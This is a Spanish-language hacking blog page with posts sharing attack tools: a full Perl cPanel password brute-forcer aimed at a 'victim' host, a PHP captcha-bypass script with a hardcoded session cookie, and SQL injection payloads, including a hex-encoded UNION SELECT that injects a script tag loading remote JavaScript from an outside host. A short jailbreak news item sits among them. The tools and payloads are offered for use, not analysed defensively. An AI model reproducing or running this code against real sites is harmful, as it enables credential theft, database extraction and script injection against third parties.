Toolz
SQL-PwnZ 1.5 – Herramienta para SQL Injection
13 jul
Algunos deben recordar que anteriormente les había hablado de esta tool. Hoy me encontré en la web de Login-Root que ya esta disponible la version 1.5.
Las novedades son:
[+] Agregado mod_security Bypass.
[+] Agregado Illegal Mix Of Collations Bypass.
[+] Agregadas más tablas para bruteforce.
[+] Agregadas más columnas para bruteforce.
[+] Código interno mejorado.
[+] Bugs Fixeados.
(No Ratings Yet)
Loading ...
Cpanel Password Brute Forcer
13 jul
Aquí les dejo una herramienta, el nombre lo dice todo. Esta hecha en Perl:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
headx();
$numstart = "-1";
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}
(No Ratings Yet) Loading ...Script PHP, salta captcha simple
7 jul
Este script les puede ser útil en algún caso, solo es modificarlo dependiendo del mismo.
<?
$ch = curl_init();
$url = "http:/url/archivo.php";
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID=a0eb811980f1f25e956dd3a501f0cc0b');
$resultado = curl_exec($ch);
$exp = explode(" = ",$resultado);
$exp2 = explode("<br />",$exp[1]);
$captcha = $exp2[0];
echo $captcha."<br>";
$ch2 = curl_init();
$url2 = "http://url/archivo.php?variable=$captcha";
curl_setopt($ch2,CURLOPT_URL,$url2);
curl_setopt($ch2, CURLOPT_COOKIE, 'PHPSESSID=a0eb811980f1f25e956dd3a501f0cc0b');
$resultado2 = curl_exec($ch2);
?>
(No Ratings Yet) Loading ...Realizar Jailbreak a Iphone, Ipad y Ipod Touch
6 may
Desde hace algunos días se encuentra disponible Spirit, una herramienta que permite realizar Jailbreak con un solo click al Iphone, Ipad y Ipod Touch. Cuenta con versiones para Windows y Mac OS y entre las novedades que nos ofrece este programa podemos encontrar que permite realizar Jailbreak a dispositivos con Firmware versión 3.1.3 (Iphone y Ipod Touch) y versión 3.2 (Ipad). Funciona con Itunes 9.1, ya que como algunos sabrán blackra1n anteriormente presentaba problemas con esa versión y solo se podía usar aplicando un parche. Y la característica más importante para mi es que permite hacer un Jailbreak permanente (untethered), es decir que si apagamos el dispositivo no tendremos que conectarlo al PC para volverlo a ‘hackear’.
Pueden encontrar la descarga en su sitio oficial: Spirit.
PD: Si tienen problemas usando este programa, ejecútenlo en modo compatibilidad con Windows 98.
Tutorial de como usar Spirit para realizar el Jailbreak
(No Ratings Yet) Loading ...General Injection Explorer 3.0
16 feb
Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.
[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.
[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.
[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–
En el siguiente gif pueden ver como funciona:
(1 votes, average: 5,00 out of 5) Loading ...SQL-PwnZ 1.1 – Herramienta para SQL Injection
17 nov
Comparto con uds una herramienta muy útil para realizar inyecciones SQL.
Más >
(1 votes, average: 1,00 out of 5) Loading ...
Wargame